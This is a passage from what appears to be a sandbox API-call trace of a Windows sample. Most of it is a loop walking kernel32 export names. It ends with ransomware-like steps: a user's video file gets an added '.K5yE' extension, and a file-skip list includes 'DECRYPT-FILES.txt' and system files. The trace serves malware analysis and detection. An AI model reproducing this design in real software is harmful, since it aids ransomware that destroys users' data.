(in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.434] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.434] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.434] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.434] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.434] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.434] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.434] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.434] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.434] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.434] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.434] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.434] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.434] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.435] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.435] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.435] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.435] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.435] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.435] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.435] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.435] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.435] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.435] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.435] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.435] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.435] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.435] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.435] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.435] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.435] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.435] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.435] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.435] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.436] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.436] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.436] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.436] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.436] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.436] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.436] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.436] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.436] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.436] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.436] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.436] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.436] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.436] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.436] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.436] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.436] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.436] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.437] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.437] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.437] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.437] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.437] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.437] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.437] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.437] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.437] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.437] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.437] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.437] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.437] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.437] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.437] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.437] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.437] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.437] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.438] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.438] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.438] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.438] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.438] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.438] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.438] lstrlenA (lpString="DELETEATOM") returned 10 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.438] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.438] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.438] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.438] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.438] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.438] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.438] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.438] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.438] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.438] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.438] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.439] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.439] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.439] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.439] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.439] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.439] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.439] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.439] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.439] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.439] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.439] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.439] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.439] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.439] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.439] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.439] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.439] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.439] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.439] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.439] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.440] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.440] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.440] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.440] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.440] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.440] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.440] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.440] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.440] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.440] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.440] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.440] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.440] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4") returned 62 [0087.440] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4.K5yE") returned 67 [0087.440] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\kqlr.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\KqLR.mp4.K5yE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\kqlr.mp4.k5ye"), dwFlags=0x0) returned 1 [0087.441] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.441] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.441] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.442] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67808170, ftCreationTime.dwHighDateTime=0x1d4d179, ftLastAccessTime.dwLowDateTime=0xfd0aa830, ftLastAccessTime.dwHighDateTime=0x1d4d460, ftLastWriteTime.dwLowDateTime=0xfd0aa830, ftLastWriteTime.dwHighDateTime=0x1d4d460, nFileSizeHigh=0x0, nFileSizeLow=0xdedc, dwReserved0=0x0, dwReserved1=0x0, cFileName="NbYe.swf", cAlternateFileName="")) returned 1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="autorun.inf") returned 1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="boot.ini") returned 1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="desktop.ini") returned 1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="ntuser.dat") returned -1 [0087.442] lstrcmpiW (lpString1="NbYe.swf", lpString2="iconcache.db") returned 1 [0087.442] lstrcmpiW 